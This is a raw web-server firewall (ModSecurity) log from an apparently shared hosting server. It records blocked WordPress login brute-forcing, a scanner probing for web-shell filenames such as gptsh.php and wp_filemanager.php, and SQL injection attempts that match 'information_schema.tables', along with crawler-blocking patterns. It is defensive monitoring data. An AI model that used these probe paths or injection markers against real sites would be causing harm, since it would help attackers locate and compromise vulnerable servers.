[Tue May 26 17:26:36.896857 2026] [security2:error] [pid 882219:tid 882395] [client 160.250.132.165:62207] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-login.php"] [unique_id "ahWKdJ8tTkZcqimiXcQI4QAAALM"]
[Tue May 26 17:26:37.113257 2026] [security2:error] [pid 882219:tid 882450] [client 203.194.101.7:58896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKdZ8tTkZcqimiXcQI5QAAAOo"]
[Tue May 26 17:26:37.113396 2026] [security2:error] [pid 882219:tid 882450] [client 203.194.101.7:58896] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKdZ8tTkZcqimiXcQI5QAAAOo"]
[Tue May 26 17:26:37.130470 2026] [security2:error] [pid 882219:tid 882451] [client 91.238.181.19:44774] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKdZ8tTkZcqimiXcQI5gAAAOs"]
[Tue May 26 17:26:37.226946 2026] [security2:error] [pid 882219:tid 882451] [client 91.238.181.19:44774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKdZ8tTkZcqimiXcQI5gAAAOs"]
[Tue May 26 17:26:38.781822 2026] [security2:error] [pid 882219:tid 882457] [client 91.238.181.19:44782] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKdp8tTkZcqimiXcQJEAAAAPE"]
[Tue May 26 17:26:38.885368 2026] [security2:error] [pid 882219:tid 882457] [client 91.238.181.19:44782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKdp8tTkZcqimiXcQJEAAAAPE"]
[Tue May 26 17:26:39.027439 2026] [security2:error] [pid 882219:tid 882419] [client 160.250.132.165:63291] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahWKd58tTkZcqimiXcQJHAAAAMs"]
[Tue May 26 17:26:40.806342 2026] [security2:error] [pid 882219:tid 882382] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKeJ8tTkZcqimiXcQJRAAAAKY"]
[Tue May 26 17:26:40.853454 2026] [security2:error] [pid 882219:tid 882467] [client 160.250.132.165:64250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "aarini.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKeJ8tTkZcqimiXcQJVQAAAPs"]
[Tue May 26 17:26:41.038652 2026] [security2:error] [pid 882219:tid 882427] [client 91.238.181.19:59304] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKeZ8tTkZcqimiXcQJVgAAANM"]
[Tue May 26 17:26:41.133811 2026] [security2:error] [pid 882219:tid 882427] [client 91.238.181.19:59304] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKeZ8tTkZcqimiXcQJVgAAANM"]
[Tue May 26 17:26:41.544208 2026] [security2:error] [pid 882219:tid 882398] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKeZ8tTkZcqimiXcQJXgAAALY"]
[Tue May 26 17:26:41.951399 2026] [security2:error] [pid 882219:tid 882460] [client 223.235.98.214:22325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKeZ8tTkZcqimiXcQJeQAAAPQ"]
[Tue May 26 17:26:41.951540 2026] [security2:error] [pid 882219:tid 882460] [client 223.235.98.214:22325] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKeZ8tTkZcqimiXcQJeQAAAPQ"]
[Tue May 26 17:26:42.375243 2026] [security2:error] [pid 882219:tid 882296] [remote 47.128.112.207:44608] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "www.karuppuswamykovil.in"] [uri "/robots.txt"] [unique_id "ahWKep8tTkZcqimiXcQJgAAA7kw"]
[Tue May 26 17:26:42.647165 2026] [security2:error] [pid 882219:tid 882365] [client 91.238.181.19:59332] ModSecurity: Rule 556f06e657e8 [id "340016"][file "/etc/httpd/modsecurity.d/10_asl_rules.conf"][line "296"] - Execution error - PCRE limits exceeded (-47): (null). [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKep8tTkZcqimiXcQJgQAAAJU"]
[Tue May 26 17:26:42.701510 2026] [security2:error] [pid 882219:tid 882357] [client 160.250.132.165:65265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "toplaptopguides.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKep8tTkZcqimiXcQJhAAAAI0"]
[Tue May 26 17:26:42.703034 2026] [security2:error] [pid 882219:tid 882420] [client 114.119.133.194:64047] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWKep8tTkZcqimiXcQJhQAAAMw"], referer: http://haddingtonwines.com/cart?remove_item=086af6e4641abb18caafc151b9aa95c8
[Tue May 26 17:26:42.745536 2026] [security2:error] [pid 882219:tid 882365] [client 91.238.181.19:59332] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKep8tTkZcqimiXcQJgQAAAJU"]
[Tue May 26 17:26:43.214272 2026] [security2:error] [pid 882219:tid 882378] [client 20.197.193.33:58481] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWKe58tTkZcqimiXcQJjQAAAKI"]
[Tue May 26 17:26:43.214412 2026] [security2:error] [pid 882219:tid 882378] [client 20.197.193.33:58481] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWKe58tTkZcqimiXcQJjQAAAKI"]
[Tue May 26 17:26:43.669207 2026] [security2:error] [pid 882219:tid 882417] [client 20.197.193.33:58375] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWKe58tTkZcqimiXcQJlQAAAMk"]
[Tue May 26 17:26:43.669305 2026] [security2:error] [pid 882219:tid 882417] [client 20.197.193.33:58375] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/x.php"] [unique_id "ahWKe58tTkZcqimiXcQJlQAAAMk"]
[Tue May 26 17:26:44.035822 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJnwAAAIg"]
[Tue May 26 17:26:44.035954 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58325] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wpconf.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJnwAAAIg"]
[Tue May 26 17:26:44.302557 2026] [security2:error] [pid 882219:tid 882446] [client 91.238.181.19:59350] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKfJ8tTkZcqimiXcQJsAAAAOY"]
[Tue May 26 17:26:44.423786 2026] [security2:error] [pid 882219:tid 882463] [client 20.197.193.33:58479] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJugAAAPc"]
[Tue May 26 17:26:44.423898 2026] [security2:error] [pid 882219:tid 882463] [client 20.197.193.33:58479] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/aaf.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJugAAAPc"]
[Tue May 26 17:26:44.516098 2026] [security2:error] [pid 882219:tid 882466] [client 104.28.122.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJswAAAPo"]
[Tue May 26 17:26:44.595800 2026] [security2:error] [pid 882219:tid 882476] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJpQAAAQQ"]
[Tue May 26 17:26:44.621462 2026] [security2:error] [pid 882219:tid 882379] [client 172.56.38.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJqgAAAKM"]
[Tue May 26 17:26:44.713791 2026] [security2:error] [pid 882219:tid 882455] [client 160.250.132.165:49935] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJvgAAAO8"]
[Tue May 26 17:26:44.852652 2026] [security2:error] [pid 882219:tid 882459] [client 20.197.193.33:58471] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJwwAAAPM"]
[Tue May 26 17:26:44.852753 2026] [security2:error] [pid 882219:tid 882459] [client 20.197.193.33:58471] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wander.php"] [unique_id "ahWKfJ8tTkZcqimiXcQJwwAAAPM"]
[Tue May 26 17:26:45.269406 2026] [security2:error] [pid 882219:tid 882474] [client 20.197.193.33:58453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWKfZ8tTkZcqimiXcQJzAAAAQI"]
[Tue May 26 17:26:45.269524 2026] [security2:error] [pid 882219:tid 882474] [client 20.197.193.33:58453] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/gptsh.php"] [unique_id "ahWKfZ8tTkZcqimiXcQJzAAAAQI"]
[Tue May 26 17:26:45.677596 2026] [security2:error] [pid 882219:tid 882441] [client 20.197.193.33:58447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWKfZ8tTkZcqimiXcQJ1gAAAOE"]
[Tue May 26 17:26:45.677790 2026] [security2:error] [pid 882219:tid 882441] [client 20.197.193.33:58447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/xocx.php"] [unique_id "ahWKfZ8tTkZcqimiXcQJ1gAAAOE"]
[Tue May 26 17:26:45.735035 2026] [security2:error] [pid 882219:tid 882375] [client 91.238.181.19:59368] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKfZ8tTkZcqimiXcQJ1wAAAJ8"]
[Tue May 26 17:26:46.051952 2026] [security2:error] [pid 882219:tid 882454] [client 20.197.193.33:58377] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ4QAAAO4"]
[Tue May 26 17:26:46.052091 2026] [security2:error] [pid 882219:tid 882454] [client 20.197.193.33:58377] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/155.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ4QAAAO4"]
[Tue May 26 17:26:46.419417 2026] [security2:error] [pid 882219:tid 882407] [client 20.197.193.33:58434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ6wAAAL8"]
[Tue May 26 17:26:46.419532 2026] [security2:error] [pid 882219:tid 882407] [client 20.197.193.33:58434] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/colay.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ6wAAAL8"]
[Tue May 26 17:26:46.682218 2026] [security2:error] [pid 882219:tid 882400] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ6AAAALg"]
[Tue May 26 17:26:46.689855 2026] [security2:error] [pid 882219:tid 882379] [client 160.250.132.165:50940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webdisk.d2cargo.com"] [uri "/wp-login.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ9gAAAKM"]
[Tue May 26 17:26:46.880833 2026] [security2:error] [pid 882219:tid 882374] [client 20.197.193.33:58469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ-AAAAJ4"]
[Tue May 26 17:26:46.880975 2026] [security2:error] [pid 882219:tid 882374] [client 20.197.193.33:58469] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/hly.php"] [unique_id "ahWKfp8tTkZcqimiXcQJ-AAAAJ4"]
[Tue May 26 17:26:47.322634 2026] [security2:error] [pid 882219:tid 882457] [client 203.194.101.7:59227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKf58tTkZcqimiXcQKBwAAAPE"]
[Tue May 26 17:26:47.322756 2026] [security2:error] [pid 882219:tid 882457] [client 203.194.101.7:59227] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKf58tTkZcqimiXcQKBwAAAPE"]
[Tue May 26 17:26:47.404439 2026] [security2:error] [pid 882219:tid 882392] [client 91.238.181.19:59388] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKf58tTkZcqimiXcQKCAAAALA"]
[Tue May 26 17:26:47.405329 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWKf58tTkZcqimiXcQKCQAAAIg"]
[Tue May 26 17:26:47.405480 2026] [security2:error] [pid 882219:tid 882352] [client 20.197.193.33:58459] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ppp.php"] [unique_id "ahWKf58tTkZcqimiXcQKCQAAAIg"]
[Tue May 26 17:26:47.782909 2026] [security2:error] [pid 882219:tid 882384] [client 20.197.193.33:58388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWKf58tTkZcqimiXcQKEAAAAKg"]
[Tue May 26 17:26:47.783043 2026] [security2:error] [pid 882219:tid 882384] [client 20.197.193.33:58388] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/201.php"] [unique_id "ahWKf58tTkZcqimiXcQKEAAAAKg"]
[Tue May 26 17:26:48.233195 2026] [security2:error] [pid 882219:tid 882443] [client 20.197.193.33:58483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKHgAAAOM"]
[Tue May 26 17:26:48.233326 2026] [security2:error] [pid 882219:tid 882443] [client 20.197.193.33:58483] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/ops.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKHgAAAOM"]
[Tue May 26 17:26:48.654717 2026] [security2:error] [pid 882219:tid 882360] [client 20.197.193.33:58454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.193.197.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKLAAAAJA"]
[Tue May 26 17:26:48.654829 2026] [security2:error] [pid 882219:tid 882360] [client 20.197.193.33:58454] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/samll.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKLAAAAJA"]
[Tue May 26 17:26:48.804455 2026] [security2:error] [pid 882219:tid 882393] [client 91.238.181.19:59410] ModSecurity: Access denied with code 406 (phase 2). Matched phrase "information_schema.tables" at ARGS:chapitre. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "253"] [id "380024"] [rev "5"] [msg "Atomicorp.com WAF Rules: Generic SQL Injection protection"] [data "information_schema.tables"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.paqys.com"] [uri "/l-apiculture-pour-tous"] [unique_id "ahWKgJ8tTkZcqimiXcQKMQAAALE"]
[Tue May 26 17:26:48.849134 2026] [security2:error] [pid 882219:tid 882420] [client 160.250.132.165:52040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/wp-login.php"] [unique_id "ahWKgJ8tTkZcqimiXcQKMAAAAMw"]
